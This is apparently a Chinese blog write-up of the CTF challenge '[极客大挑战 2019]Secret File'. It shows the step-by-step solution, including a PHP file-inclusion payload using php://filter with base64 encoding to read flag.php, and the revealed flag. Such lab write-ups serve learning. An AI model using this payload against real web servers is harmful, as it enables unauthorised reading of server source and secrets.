[极客大挑战 2019]Secret File

在这里插入图片描述
一、题目打开,查看源码,发现有Archive_room.php,点击跳转。
在这里插入图片描述二、点击secret,跳转到结束页面
在这里插入图片描述
三、结束页面提示回去再仔细看看,看大佬wp,怀疑是重定向,用burp抓包试试

在这里插入图片描述四、发现有action.php,再试试
在这里插入图片描述
五、发现有secr3t.php ,访问
在这里插入图片描述
六、看见了源代码,看见flag.php,include,应该想到php伪协议,直接文件包含代码试试:
php://filter/read=convert.base64-encode/resource=flag.php。
playload:
网页?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述七、回显看起来是base64加密,解密一下

<head>
    <meta charset="utf-8">
    <title>FLAG</title>
</head>

<body style="background-color:black;"><br><br><br><br><br><br>
    
    <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
    
    <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
        <?php
            echo "我就在这里";
            $flag = 'flag{56e0e549-b5c0-464c-819e-e5291d577fdc}';
            $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
        ?>
    </p>
</body>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值